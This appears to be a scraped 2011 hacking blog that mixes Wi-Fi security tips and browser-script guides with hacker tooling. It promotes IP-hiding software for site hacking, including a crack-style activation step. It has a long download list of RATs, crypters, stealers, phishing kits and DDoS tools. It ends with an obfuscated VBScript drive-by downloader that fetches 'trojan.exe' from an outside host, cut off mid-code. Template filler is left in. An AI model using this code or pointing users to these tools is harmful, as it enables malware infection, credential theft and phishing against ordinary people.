Using Dynamic IP as Static IP

Everyone Like to send Anonymous Mail to your enemy or friend or teacher. Here is the Hacking tutorial for you to implement that. So i hope This will be best hack for you.

DNN METHOD COMPLETE TUTORIAL HOW TO HACK A WEB SITE WITH ASP SHELL

This is default featured post 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured post 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured post 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

Monday 26 September 2011

How to Check If Someone Is Stealing Your Wi-Fi and How to protect it

When you find that your internet has slowed down suddenly, there are chances that someone has hacked into your account. This is one single clue to suspect that someone is hacking into your account, and if you think that your old router with WEP security you can escape from the vicious eyes of the hacker then you are wrong. These days’ hackers hack your account by bye-passing WEP security also. They have special hacking routers to do this. Besides, the heavy charges that you will be facing and if you think, you need not bother because you have an unlimited account, then you are wrong. All the mischief and online notorious activities done by them will reflect on to your account and therefore you will be in soup for the folly of someone else, if identified. So you need to learn how track down that you are being hacked or not!
StealingWiFi
Track the hacker down physically:
The process of tracking them down physically will involve running the Moocher hunter live CF tracking suite, which will enable you to physically track the hacker down by triangulating the network signals.
What is next? Use Basic security and WEP:
All routers that are not older than 5 years has the option of increasing the security using a more secure authentication protocol, for which you need to log into your router again, the settings for which is found in the Wireless Settings screen dialog box. To make the transmission much more secure, change your security settings toWPA2, which is much more secure by choosing the option of WPA2.
When you are using the Wi-Fi for personal work this is advisable not to choose the Enterprise option thinking that this will make you more secure. This is because this option has been tailored for meeting the demands of companies and this will not work for personal purposes.
When you are choosing the password for making your Wi-Fi secure, choose a password that is 15 characters long with lower and upper cases, numbers and punctuations symbols.
Besides there are a few other things that you need to do to make your Wi-Fi access entirely secure.
Hiding your SSID:
This is worth trying to hide your network name, but this is of no use these days with the availability of counter softwares like Backtrack that can reveal your hidden name instantly.
Steal Internet
IP filtering:
This blocks out a specific IP, and permits you to change your IP address whenever you are in doubt of being hacked, which is a very simple process like refreshing your system. Actually I missed out to block an IP and I really paid a lot to protect my weight watchers promo and E-diets coupon codes blog from the attackers, so be careful.
Mac Filtering:
This is one the of the most secure methods that you can depend on as this blocks the hacking of your device by using a unique hardware address, which is given at the time of purchasing, however, these days this is overridden by the hackers using a “Spoof” mechanism to steal your Wi-Fi Mac address.
Use a Paid Wi-Fi portal:
This is a kind of business that happens when you install the open source DD_WRT, that you will be able to run a paid Wi-Fi hotspot portal. You can set your own rates for using these paid Wi-Fi portals, which automatically runs a payment processing system, and you will be paid a check when someone hacks and uses your Wi-Fi portal. However, for this to be effectively implemented you need to live in a big city.
In the end I would like to stress upon that that do not immediately jump into a conclusion that someone is hacking into your Wi-Fi account because this is a bit slow, try to check your computer speed, or your router may need some rebooting and also you should try reboosting your Wi-Fi signal. When all the other things are all right, and then go in for checking whether you are being hacked as this is the last but not the least option that could be the reason for reduced Wi-Fi speed.

How to Secure Your Wireless Internet Network

Wireless internet is one of the most predominant means of achieving high speed internet connection nowadays. Wireless internet connection started with it being used in companies and cafes, and later it became popular in schools and hospitals till we now have it at homes. Almost on every street you walk through, there is one wireless internet connection or the other, either for free or available upon entering some unique vouchers.
protect-Wireless-Network1One issue, though, with wireless internet connection is that it brings up concerns in terms of security. Because of the privileges outsiders are made to have where there is a wireless internet connection, there have been ways and smart methods that can allow people to make use of your wireless internet connection without your permission.
Because I was going to need a sophisticated internet connection for the service of my lunarpages and iContact coupon website, I decided to install a wireless internet in my home, but it wasn’t easy battling intruders. This problem, because of its persistency, has thought me some lessons on securing your wireless internet which I want to share with you.

Make Your Admin Details Unique to You

Due to persistent security issues with my wireless internet connection, I’ve leant that it’s always safer to change the administrator’s privileges of my router upon the installation of my wireless internet connection.
Routers, by default, are always with administrator’s privileges that are too generic, such as having the password as password or admin and username as username or admin. This, unfortunately, is known to almost everybody and anyone about to use your wireless internet connection without your permission will first try these generic usernames and passwords.
Make sure you are not using the default admin privileges of your router, if it’s so in your case, quickly change it now to enhance the security of your wireless internet connection.

Use Firewalls to Protect your Network

Modern wireless network routers come with in-built firewall for security against intrusions. You can enable your wireless router’s security firewall as this will improve the level of your wireless internet connection’s security.
If you are using a wireless internet connection router that does not have an in-built firewall, you can download and install it on your router from the internet.

Always Switch off Your Router When not in use

Which way is the best way to stay away from hackers or keep your wireless internet connection safe from unsolicited usage? To turn it off totally is the best way. It’s only when your wireless internet connection is on that you’d have people attempting to break into it.
The best thing to do is to turn your router off whenever nobody is using it or whenever no one is home to watch over it.

Limit Your Router’s Broadcast Range

Are you using your router to broadcast internet network to a wide range of space or is your wireless network being used in a bigger hall or room? You can restrict your wireless network’s broadcast reach to a very limited range so that only people that are very close to the router can access the network.
This will work well if you are using your wireless network in a small place like in your living room and in a small office.

HOW TO GET OLD FACEBOOK CHAT

How to Get Old Facebook chat


How to Install Old Facebook Chat Script in Google Chrome

In Google Chrome, its really easy task to install the script to enable the Old facebook chat. Just Click the Following link to install Script. CLICK HERE TO GO TO DOWNLOAD SCRIPT PAGE. In the Script page Click ‘INSTALL’ button which is in the Top Right side of the page.
Script install
Now the Install Popup will appear, in that box CLICK ‘INSTALL’ and now the Script is Installed.
Facebook chat script installed
Now the Script is Installed. Now Close the Existing Facebook page and Open the Facebook again. You can See your Old Favorite Chat is available. If you cant see the old facebook chat, Clear the cache and open the facebook. Anytime you can remove this script from extension menu of the Google chrome to get the New sidebar chat box.


How to Install Old Facebook Chat Script in Mozilla Firefox

In Mozilla Firefox, First we need to install Grease Monkey Add-on before installing the Old Facebook Script. So Open the Firefox and go to Download page of the Grease Moneky Add-on from the following link. Click here to go to Gease Monkey Add-on Download page. In the Download page Click ‘Add To Firefox’ button.
Add to Firefox
After clicking ADD TO FIREFOX button, the popup will ask about installation. Click INSTALL and Its done.
Installing Geasemonkey
Now Gease Monkey Add-on is Installed. Now Click here to go to Script Page in the Script Page click Install button which is in the Right top, same as we did above for How to get Old Facebook chat for Google Chrome.
After installing Close the Facebook and Open it again to see the Old Facebook chat is available. if you can’t find, Clear the cache files and try again. Anytime you can remove this script from Gease Monkey add-on to get the New sidebar chat box.

[Update] HOW TO GET OLD FACEBOOK CHAT IN OPERA

Click here and Go to Install Old Facebook Extension and Restart the browser to get your Facebook Old chat.

Wednesday 21 September 2011

Using Dynamic IP as Static IP


As we discussed in Basic Lab Setup For Hacker a hacker needs a static IP which is really very expensive for a normal person to have. Here we will discus how we can counter this problem. Please note that this solution is temporary and can never really take place of static IP but for now it will work.

For this we will use DNS redirect service from www.no-ip.com alternatively you can also use www.dyndns.com.

First of all register with www.no-ip.com by clicking on “No-IP Free” on home page. After you complete registration form hey will send you an confirmation e-mail, once confirmed, then you can log in to your account.
 
Now click on “Hosts/Redirect”, then type the host redirect name you want to which Dynamic DNS will redirect traffic after associating your IP. Let other options remain as it is if you don't know what they do.
Now create your host name  Now download "Download Client" After installing DUC client type your e-mail address and password.
 

To check its working or not, type www.whatismyipaddress.com and check your IP address now ping the host name you created both will have same IP address.

How to Change Your IP Adress and Surf The Web Anonymously

Download Invisible IP Map to surf anonymously in internet. Hide your IP and encrypt your connection.

In this article i’m going to show you a software, Invisible IP Map, that can make you be “anywhere” in world. People that hack sites will need this small baby to help em on the way. This tool will put you in selected location all around the world...
Invisible IP Map is user-friendly software that masks your real location. Every computer that is connected to the Internet has its own IP address which could easily be located on a map. This program will help you show yourself like you are surfing from another place on the planet.
Product Information:
This is a Mask IP software which is used to change your real Internet address while browsing. The software will deliver you fresh anonymous proxy servers every time you decide to click on “Get IP Locations”. The main benefit of this software is that you can’t be traced when browsing websites. Also if a website is restricted for users from specified country the program can bypass that protection. By hiding your IP you will prevent receiving spam from marketers which know your interests by tracking your IP when browsing websites. You can use web based e-mail to send anonymous e-mail. Post on bulletin boards without displaying your real IP address.
Main Screens:

Map Menu: This is they key part of the software. Here you can change your IP address, retreive IP locations, get information about your IP location or the location of the other server. In addition, you can recheck the servers.
IP Information: This screen will give you all the information about your IP and the remote IP. You can see information such as city, region, country, distance between you and the remote server, server type, timeout etc.
Custom proxy checker: The proxy checker is specially designed for those of you who have own proxy lists. You can add them to the checker and check whether they are working.
VIP Servers: This is optional add-on for Invisible IP Map software. The VIP servers will give you a high-speed internet access with 128 Bit SSL encryption.
How To Activate :
1. Replace the original “Options.ini” in the program files folder with the one in the RAR (downloaded one ) and then open the program again. Don’t use the details in the ini.

2. After doing that here are the results:

This is a very nice software and i recommend you to try it. Enjoy !!!

Auto Hide IP 5.1.3.6 Portable


Auto Hide IP 5.1.3.6 Portable | 2.6 MB

Browsing on the Internet is becoming more and more dangerous in today's world. Hackers and identity thieves are trying to use your IP address to get any information out of you: home address, credit card information, social security information, your bank accounts and other personal information. Auto Hide IP is privacy-protection software which enables you to conceal your real IP address, surf anonymously, and automatically make positive changes to IP address every short while.

With it, you can select a fake IP address from different countries via "Choose IP Country" option and can Check IP directly. It allows you to conceal your identity online by showing a fake IP address, blocking hackers and prying eyes from monitoring you. You can also choose "Launch on Startup" and then it will run and load a fake IP address automatically when you log on to Windows. Besides, you can easily switch between fake IP and real IP, all with the click of a button.

Auto Hide IP works with Internet Explorer, Firefox, Opera, Maxthon, MyIE and is compatible with all types of routers, firewalls, home networks, wireless networks and any other kind of Internet.

Key Features
- Anonymous Web Surfing
Assign you fake IP addresses and guard against hackers who will be tricked by your fake IP instead of your real one.

- Protect Your Identity
Hide your real IP when surfing the web to prevent hackers or identity thieves from monitoring your web activity or stealing your personal information such as your financial information.

- Choose IP Country
You decide to use fake IP from different countries via "Choose IP Country" option and you can check the current IP directly.

- Send Anonymous Emails
Hide your real IP address in email headers. Be protected in email-sending from Yahoo!, Hot-mail, GMail, etc.

- Un-ban Yourself from Forums and Message Boards
Use Auto Hide IP to change your IP which allows you to access any forums or restricted websites that have banned you.

Home Page - www.autohideip.com



DOWNLOAD

Super Hide IP 3.1.1.2

Super Hide IP 3.1.1.2 | 8.41 MB


Do you know what your IP address means? Are you aware that your IP address is exposed every time you visit a website? Many websites and hackers use IP address to monitor your home address and other personal information. Your IP address is your online identity and could be used by hackers to break into your computer, steal personal information, or commit other crimes against you. Super Hide IP allows you to surf anonymously, keep your IP address hidden, protect your personal information against hackers and provide full encryption of your online activity, all with a simple click of a button.
Key Features
Anonymous Web Surfing
Click Hide IP button and you will be assigned fake IP addresses, preventing others from getting your true IP when surfing the Internet.
* Protect Your Identity
Surf anonymously to prevent hackers or identity thieves from monitoring your web activity or intercepting your personal information such as your financial information.
* Choose IP Country
You can select to use fake IP from different countries via “Choose IP Country” option and can Check IP directly.
* Send Anonymous E-mails
Hide your IP in E-mail headers. Be protected while sending e-mails via Yahoo!, Hotmail, GMail.
* Un-ban Yourself from Forums and Restricted Websites
Use Super Hide IP to change your IP which allows you to access any forums or websites that has ever banned you.
* Platform
Windows 2000/XP/Vista/7 (32-bit and 64-bit)
OR

Justniffer is a tcp packet sniffer. It captures reassembles and reorders TCP packets, performs IP packet defragmentation and displays the tcp flow and trace timings. It is useful for logging network traffic in a 'standard' (web server like) or in a customized way. It can log http response time, useful for tracking network services performances (e.g. web server, application server, etc.) . Main differences from other sniffers: - it captures tcp/ip traffic and handle all tcp/ip stuff (reordering, retrasmissions, defragmentation). The tcp stream adjustment is very reliabe since is performed using linux kernel code included in a slightly modified version of the nids library. - it reports timing informations. So it can be useful for tracking network system performances: for example http response time, connection time, etc. - it can generate logs in a highly customizable way. 
For example it can mimic the apache access_log You can extend traffic analisys with scripts that are executed to each captured request/response sequence. justniffer-grab-http-traffic is a provided example that captures network traffic, identifies http contents (images, text, html pages, javascript, flash, video, etc) and saves them into files.


DOWNLOAD

V

Super Pacote Hacker




Then
NOTE: Click the Stealth Pic

Backtrack Hacking DVD Tutorials (Full DVD) Backtrack Hacking DVD Tutorials (Full DVD) Bonus Hacking video


   Ferramentas de administração remota / Trojans  1. 1.03.4 BETA Cerberus 2. Turkojan 4 de ouro 3. Apocalypse 1.4.4 4. Spy-Net 2,6 Rar senha: Spy-Net 5. Rat Pro v1.9 6. Poison Ivy 2.3.2 7. Bandook Rat v1.35 8. Bifrost v1.0 9. CyberGate v.1.01.0 10. Lost porta LUZ v4.2 11. Besta 2,07 12. Shark v3.0.0 13. Sub7 v2.2 14. Dor RAT v0.1 15. xHacker Pro v3.0 16. Seed v1.1 17. Optix Pro v1.33 18. Darkmoon v4.11 19. CIA v1.3 20. Y3k RAT v1.0 21. Minimo RAT v0.7 22. NetDevil v1.0 23. Deeper RAT v1.0 24. Schwarze Sonne RAT Public Beta 0.1 2 25. Schwarze Sonne RAT 0,7 26. Schwarze Sonne RAT 0,8 27. Schwarze_Sonne_0.5_Beta 28. Schwarze Sonne RAT 0,2 Beta 29. [CORREÇÃO] SS RAT-0.4 Final 30. A32s (quinto) RAT 31. Arctic RAT 0.0.1 Alpha 32. CyberGate v1.02.0 33. CyberGate v1.03.0 34. CyberGate v1.04.8 35. CyberGate_v1.01.8 36. CyberGate-v1.00.0 37. Daleth RAT 1,0 (src rato ss) 38. DarkComet2RC1 39. DarkComet2RC5 40. DarkComet RAT 2.0 Final 41. DarkComet RAT 2.0 RC2 Final 42. DarkComet RAT 2.0 último beta 43. 2.0b3 DarkComet RAT- 44. DarkComet RAT 2.0b-2 45. Deeper 1,0 Beta10 - Fix1 46. Deeper_1.0_Beta8 47. Deeper_1.0_Beta9 48. Drat 2009 V4.0 Build 1201 49. Drat 2009 V4.2 Build 1216 50. Golden Phoenix Rato 0,2 52. GraphicBooting RAT Beta v0.3 53. Lost porta V2.2 Stable edição Pública 54. Lost porta v 4.3.1 55. Beta miniRAT 0,6 56. NovaLite_final5 57. Pocket RAT 58. Spy-Net 2,7 59. RAT SS-0.5 Final 60. SS-RAT 0,6 Final_bugfix 61. RAT SS-0.6 Public Beta 62. Vanguarda 63. Venomous Ivy 64. Vortex RAT 65. Xtreme RAT v1.0 66. Remote Administrator (Radmin) v3.1 Cracked 75. MofoTro 76. Atacante árabe-v1.2.2 77. Atacante árabe-v1.4.0 78. Arquelau Beta 79. Arctic RAT 0.0.1 Alpha 80. Arctic RAT 0,1  81. Char0n 82. Erebus v1.0.2 privados Cracked 83. Nytro Rat + Código Fonte -------------------------------------------------- ------------------------------  Aglomerantes: 1. UniProject Binder 2. Sh! T Binder Multi 3. bl0b Binder + exclusivas Stub Generator 4. Sadaf Binder 5. vBinder 6. KBW Binder 7. SaLiXeM Binder 8. YAB Binder V2.01 9. EES Binder V1.0 10. Albertino Binder 11. Rapid v Binder 1.0 [Arquivos Ultimate para vincular] - 100% FUD 12. BlackHole Binder 13. FBI Binder 14. Predator 1,6 15. PureBiND3R por d3will 16. Schniedelwutz Binder 1,0 17. Binder simples por Stonedinfect 18. Binder sp1r1tus 1,0 19. Binder Tool-Store 1,0 20. Ferramenta-Store Binder Toasty 1,0 21. Ainda Binder Outro 2,0  -------------------------------------------------- ------------------------------  Crypters 1. Carb0n Crypter v1.8 2. Fly Crypter v2.2 + exclusivas Stub Generator 0,6 3. JCrypter 4. Triloko Crypter 5. Halloween Crypter 6. Deh Crypter 7. Hatrex Crypter 8. Octrix Crypter 9. NewHacks Crypter 10. Refruncy Crypter 11. Polifemo Crypter ebrio 12. Infinity Crypter 13. Crypter Hallow's Scantime 14. Daemon Crypt v2.0 15. NTPacker 16. El Bruto Crypter V2 17. [FUD] 146, crypter / embalador / downloader / startup  18. iCrypt Abronsius Edition  19. Crypter ASM Simples 20. XxVtecman9xX_Crypter 21. Crypter Grenade (NOVO) 22. Sick Crypter 23. Sikandar's_Crypter_Version_1 0,0 _Public 24. Bifrost Crypter por 2 Arexx 25. Cryptable Sedução 1,0 por Dizzy 26. Crypter por Permabatt 27. Crypter por Yoda 28. Cryptic 1,5 29. Decepção 4 por [Ira] [Favoritos] 30. Destructor Crypter 31. EXECrypt um M0d por CARDX 32. Buzz Fuzz 1,2 por BulletProof 33. OSC-Crypter por M0d haZl0oh Crypt 34.Poison Ivy M0d por CARDX 35. SaW Mod V1 por LEGIONPR 36. Skorpien007 Crypter 3,1 37. Stonedinfect Crypter 1,0 38. Trojka Crypter 1,1 por tr1p0d 39. Decepção 4 por [raiva]  -------------------------------------------------- ------------------------------  Virus Builders 1. Worm Nathan Imagem 2. Dr. Maker Virus VBS 3. WormGen p0ke's v2.0 4. VBSWG Beta 2 5. Criador de vírus Vírus-O-Matic 6. Kill Switch v1.0 7. Terabit Virus Maker v2.8 8. Inferno P2P Worm Generator v1.8 9. Shadow Gen Vírus Batch [5.0.0 Vírus 10.DELmE 'Batch s Generatorv2.0  -------------------------------------------------- ------------------------------  Scanners  1. DD7 Port Scanner 2. SuperScan 4,0 3. Trojan Hunter v1.5 4. ProPort v2.2 5. Putaria Tópicos v3.1 6. Scanner Blue's Port V5 7. Angry IP Scanner 2,21 8. XSS Scanner 9. TE Port Scanner 10. Free IP Scanner 11. Bobup Scanner v2.1.2 12. Advanced IP Scanner 13. Advanced Port Scanner 14. Putaria Tópicos 15. LanSpy 16. NeoTracePro 17. NetScanTools 18. ProPort 19. Putty v0.6 20. SuperScan 21. Zenmap - Nmap v5.21 [Windows]  -------------------------------------------------- ------------------------------ Dosadores, DDoSers, Flooders e Nukers  1. rDoS 2. zDoS 3. Site Hog v1 4. SYN Flood 5. BFF DoS 6. Good Bye v3.0 7. RPCNuke 1,0 8. Rocket v1.0 9. Panther Modo 2 10. Final Fortune 2,4 11. Clique v2.2 12. BattlePong 13. Assalto V1.0 14. Supernova V5 ferramenta de DDoS (VIP) 15. Negação HTTP Flood of Service (DoS) Ferramenta de Testes 16. iGirls DoS Tool [Livre] 17. Longcat Flooder 2.3 (Ferramenta DoS) 18. V5.5 DoS (Denial Of Service) 19. estilo Counter Strike DoS 20. Xdos, Dos Ferramenta 21. t3c4i3 Dos Tool v2.00 [updated 2010/09/03] 22 BioHazard DOS 2  23. DoS BioHazard (TCP) 24. FubarDoS - ferramenta DoS agora público 25. Black Mamba Dos 13Mb Atacante / s 26. ~ Foda-se! ~ DOS  27. NetBotAtt14En 28. Clique v2.2 29. Falsificado IRC Nuker v1.3 30. Hartz4Flooder v0.2 31. Bitslap 32. Crazyping v1.1 33. Killme v1.0 34. killer Bd0rk de DoS 35. Krate bombardeiro porto 36. Fartos v2.0 37. Gimp 38. Muerte v2.1 39. Kaput v1.0 e v1.5 beta 40. Donut flooder http v1.4 41. sede de sangue 42. Hospitables Nuker v2.2 43. Bitchslap v1.0 44. Razors ferramenta DoS v1.1 45. Try2DdoS 46. Firewall assassino v1.3 47. Morte destruição n 48. Assault v1.0 49. NetBot Atacante v1.4 Inglês 50. Panteher v2.0 51. Battle Pong 52. Nemesy v1.3 53. Meliksah nuke v2.5 54. Inferno Nuker 55. IGMP nuke v1.0 56. ataque DDoS Server 57. DenDen PROJETO DDoS V.1 58. MegaD34TH - DDOS / Scan / Ataque ferramenta Freeze /! 59. xFatex DDOS Rede / servidor Flooder 60. SuPeRdOS {?????} {?????} 61. Website_Crasherv4.7 62. IFRAME_DDoS_v1.0 63. Porto Ddos IP 64. IRÃ DoS  -------------------------------------------------- ------------------------------  Host Booters 1. Metus Delphi 2,8 2. XR Booter Host 2,1 3. Metus Edition 2,0 GB 4. BioZombie v1.5 5. Host Booter e Spammer 6. DDoSeR 3,4 (Não precisava de crack) 7. Z3r0xb0t Core Public Release [v2.0 -------------------------------------------------- ------------------------------  Ladrões  1. Stealer tela escura V2 2. Stealer IP Dark 3. Laboratório Stealer 4. 1337 Steam Stealer 5. Multi Password Stealer v1.6 6. Firefox Password Stealer 7. PassStealer v3.0 8. PWStealer V2.0 9. Universal1337 V2 10. Senhor PS 11. JPS 1,8 12. HackHound Stealer 13. Aura Stealer v1.0b 14. BKL Stealer V2.0 15. Stealer spam / Keylogger 16. iStealer 3,0 17. iStealer 4,0 18. iStealer 5.0 (MOD) 19. Midnight Stealer 1,5 20. Ref Stealer 1.0 21. Remote Penetração v2.2 22. SimpleStealer v1.2 23. PW Stealer Unlimited v0.4 24. iStealer 6,3 25,1337 Stealer SteamACC Privada 26.Allround Stealer 27. Armageddon Stealer 1.0 por Krusty 28. bl0b Recovery 1.0 29. Blade Stealer 1,0 PÚBLICO PW Stealer 30.Codesoft 0,35 31. PW Stealer CODESOFT 0,50 32. Stealer tela escura 2 33. Dimensão Stealer 2 por Gumball 34. FileZilla Stealer 1,0 PÚBLICO 35. FileZilla Stealer por Stonedinfect 36. Firefox Password Stealer - Steamcafe 37. Fly Stealer 0,1 38. Fudsonly Stealer 0,1 39. Hackbase Phisher Steam 1.2 Beta 40. 0.0.1.4 spam 41. spam Stealer 42. HardCore 0.0.0.1 Soft 43. ICQ Steal0r 44. IStealer 4,0 45. IStealer 6,0 Legends 46. LabStealer por Xash 47. Multi Password Stealer 1,6 48. Papst Steale.NET 49. Passe Stealer 3,0 50. Pesca Stealer 0,2 51. pixel Stealer 1.3.0 SC 52. Stealer pixel 1.4.0 53. ProStealer 54. Público Firefox 3 Stealer 51. Pure Vapor-1.0 CS 52. PW Stealer por Killer110 53. Remote Penetração 2,2 54. SC LiteStealer 1 55. SimpleStealer 2,1 56. SPS Stealer 57. SStealer por till7 58. Steam Stealer 1.0 por ghstoy 59. Steam Stealer por till7 60. Ladrão Estúpido 6 Logger PHP mit 61. Sistema Stealer 2 62. Os Simpsons Stealer 0,2 63. Stealer FileZilla Tool-Store 1,0 64. Ultimate Stealer 1,0 65. Universal1337 - O Ladrão Conta 63. Universal1337 3 -------------------------------------------------- ------------------------------ Falso Programas  1. PayPal Money Hack 2. Windows 7 Gerador Serial 3. Keygen COD MW2 4. COD MW2 Key Generator 5. DDoSeR 3,6 6. Dice Rigger 7. Doxie v1.2 8. Vapor KeyGen 9. Emblema Crypter 10. Flex Bot RuneScape 11. Flooder 12. Gamebattles Adder crédito 13. Kaspersky KeyGen 14. Generator Microsoft Point 15. MSN Password Cracker 16. MSDN Maker Admin 17. Multi Hacker 18. Gerador de Serial MW2 19. KeyGen do Norton 2010 20. Conta PayPal Verified 21. PayPal Hacker Money 22. Xbox 360 conta Hacker 23. WoW Hacker Conta 24. Windows Activator 25. TeamViewer Patcher 26. Runescape Stat Changer 27. RapidShare Extender 28. Poker Hack -------------------------------------------------- ------------------------------  Cracking Tools 1.VNC Crack Driver 2.Access 3.Attack Toolkit v4.1 e código fonte incluído 4.Ares 5.Brutus 6.Sentry20 Análise: · OllyDbg 1,10 e Plugins - Modificado por SLV * NOVA · W32Dasm 8,93 - * Patched * NOVO · PEiD 0,93 + Plugins * NOVA · RDG Packer Detector v0.5.6 Beta - Inglês * NEW *  Reconstrução: · 1,6 ImpRec - Corrigido pelo MaRKuS_TH-DJM/SnD * NOVA · 1.5 Revirgin - Fixed * NOVA · LordPE B De Luxe * NOVA  Packers: · FSG 2,0 · MEW 11 1.2 SE · UPX 1,25 e * nova GUI · SLVc0deProtector 0,61 * NOVA Braço · Protector v0.3 * NEW * · WinUpack v0.31 Beta * NEW *  Patchers: · DUP 2 * NOVO · CodeFusion 3,0 · Universal Patcher Pro v2.0 · Universal Patcher v1.7 * NEW * · Criador Universal Loader v1.2 * NEW * · Apatch v1.07 · PMaker v1.2.0.0 * NEW * Patch · Tola é v2.03b Engine · ABEL Loader v2.31 Patcher · Yoda Processo * NOVA · Criador Correção de registro * NOVA PatchEngine · ScAEvoLa de v1.33 * NEW * Genuine · Dogbert Patching Engine v1.41 * NEW * · Gráfica-PatchMaker v1.4 * NEW * · O MACACO v0.0.7 BETA * NEW * · Liquid2 * NOVA · PELG v0.3 * NEW * · PrincessSandy v1.0 * NEW *  Editor HEX: · BIEW v5.6.2 · Hiew V7.10 * NEW * · WinHex v12.5 * NEW *  Decompilers: · Denise 3.50.04 VB ·? Decompiler? Lite v0.4 * NEW * · Flasm  Unpackers: · ACProtect - ACStripper · ASPack - ASPackDie ASProtect ·> Stripper Stripper 2,07 e 2,11 RC2 Final * NOVA · UnDBPE> DBPE · FSG Dumper 1,33 Pumqara>'s · FSG 2,00> UnFSG · MEW> UnMEW · PECompact 1.x UnPecomp> · UnPEncrypt> PEncrypt · PeSpin DeSpinner 0,3> 0,3 · TElock 0,98-1,0> UntELock · EXEStealth> UnStealth · Xtreme-Protector / Themida> XprotStripper v1.1 * NEW * · Killer Morphine 1.1 por SuperCracker / SND * NOVA · ASPR Dumper v0.1 * NEW * · Armadillo processo de desanexação v1.1 * NEW * · Armadillo Dumper v1.0 * NEW * · Fixer Armadillo Nanomite * NOVA · Distância Armadillo Decryptor aka Fixer Tabela Jump * NOVA ArmTools · (Translated!) * NOVA · ArmInline v0.1 * NEW * · Rápido Descompacte v1.0b3 * NEW * · ProcDump v1.6.2 * NEW *  Keygenning: * NOVA · Studio Ripper TMG 0,02 * NOVA  Outros: · FileMon v7 * (Patched) NOVO · RegMon v7 * (Patched) NOVO · RSATool 2 · DAMN HashCalc · EVACleaner 2,7 · Processo Explorer · Resource Hacker · Pupe 2002 · Localizador PointH * NOVA · Localizador ASPR CRC 1.2 * NEW * · Ferramentas PE 1,5 RC5 * NOVA · Localizador de Endereço API * NOVA »Ir para o Hex * Converter * NOVO · Gerador PE * 1.2.1 * NOVO · Rápido File Viewer v1.0.1 * NEW * PE · 0.3b Insight * NOVA · Pesquisador Crypto * NOVA · PE Editor v1.7 * NEW * · Bkslash do Inline Patcher * NEW * · Stud_PE v2.1 * NEW * · Injecta v0.2 * NEW * · PE v0.96b Rebuilder * NOVA · PE Optimizer v1.4 * NEW * · ToPo v1.2 * NEW * · NFO Builder v1.02 2000 * NOVO * · NFO File Maker v1.6 * NEW * · TMG NFOmakeR v1.0 * NEW * · * NOVO * hCalc -------------------------------------------------- ------------------------------   Phishing Pack + Programa Página de Login 1.Fake (Tutorial) 2.Phisher Maker 3.YouTube Phisher 4.XboxLive Phisher 5.WWE Phisher 6.WoW Phisher 7.Wells Phisher Fargo 8.Warez-Phisher bb 9.Steam Phiser 10.SourceForge Phisher 11.Skype Phisher 12.SendSpace Phisher 13.RuneScape Phisher 14.Ripway Phisher 15.PornoTube Phisher 16.Photobucker Phiser 17.PayPal Phisher 18.NationWide Phisher 19.AIM Phisher 20.facebook Phisher 21.FileFront Phisher 22.Gmail Phisher 23.GoDaddy Phisher 24.Habbo Phisher 25.Hi5 Phisher 26.hotmail Phisher 27.HP (Oficina) Phisher 28.eBay.com Phisher 29.Yahoo.com Phisher 30.Gmail.de Phisher 31.RapidShare.de Phisher 32.RapidShare.com Phisher 33. Playstation Underground 34. Amazônia -------------------------------------------------- ------------------------------  Ferramentas do SQL Injection 1.Vbulletin 3.6.5 Exploit 2.sqliHelper 2,7 3.sqli coluna contador scanner 4.exploit bruteforcer 5.cpanel SQLI 6.blind Localizador 7.admin 8.SQLDEFACER 9.MySQLi_Dumper_v.1.2 10.GYNshell.php 11.Acunetix.Web.Vulnerability.Scanner.Enterprise.E dition.v6.0-EDGE Ferramenta de Injeção de SQL Avançado - 12.Havij 1,08  13.Hexjector v1.0.7.3 Edição Especial  14.SQL ExploitScanner V3 Rebuild Version  15.SQL Exploiter Professional v2.15  Lançado 16.Pangolin 3.2.1.1020  17.SQL injeção Ferramenta v2.1  18.SQL Power Injector 1,2 


http://adf.ly/2pyU5


Happy to announce the general availability of the WLAN Security Megaprimer course DVD!


With over 40+ HD videos containing 12+ hours of Wireless Ownage, this DVD weighs in at around 4.2 Gigabytes.


Direct Download Links:


1. Mirror thanks to Mister_X from the Aircrack Team: 


http://securitytube.aircrack-ng.org/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso

2. Mirror thanks to Chaos Darmstadt: 


http://private.chaos-darmstadt.de/~alech/securitytube/WLAN-Security-Megaprimer-v1.iso


3. Mirror thanks to KokelNet.de (both IPv4 and IPv6!):


http://securitytube.kokelnet.de/DVDs/WLAN-Security-Megaprimer-v1.iso


4. Mirror to the BofH of Nikhef (both IPv4 and IPv6!):


http://wipkip.nikhef.nl/events/securitytube/DVD/WLAN-Security-Megaprimer-v1.iso


5. Mirror thanks to y0ug: 


http://mirror2.codsec.com/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso 


http://mirror.codsec.com/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso


6. Mirror thanks to Bernard from Insecure.co.nz :


http://www.insecure.co.nz/WLAN-Security-Megaprimer-v1.iso


7. Mirror thanks to djekl :


http://securitytube.djekl.co.uk/Wi-Fi-Security-Megaprimer/WLAN-Security-Megaprimer-v1.iso


Torrents


1. Torrent thanks to Christiaan Rakowski: 


http://csrakowski.dyndns.info/files/WLAN-Security-Megaprimer-v1.iso.torrent


2. Torrent thanks to Tobias Koopmann: 


http://tracker.kokelnet.de/torrents/WLAN-Security-Megaprimer-v1.iso.torrent


MD5 Hash: 939d8aa5eb2cd0fa63295953ecf36580

Trojan Attack Through The HTML



All you must have heard tht some one got infected with a trojan by visiting some website .

In this Tutorial i am going to help you understand how tht is done !!!


Look at this Html code,
<HTML>
<BODY>
<script language="VBScript">
on error resume next
dl = "www.abc.com/trojan.exe"
Set df = document.createElement("object")
cls1="clsid:BD96"
cls2="C556-65A"
cls3="3-11D0-9"
cls4="83A-00C04FC29E36"
clsfull=cls1&cls2&cls3&cls4
df.setAttribute "classid",clsfull
strr1="Mic"
strr2="roso"
strr3="ft."
strr4="XML"
strr5="HTTP"
strr=strr1&strr2&strr3&strr4&strr5
Set x = df.CreateObject(strr,"")
ab1="A"
ab2="dod"
ab3="b.S"
ab4="t"
ab5="re"
ab6="am"
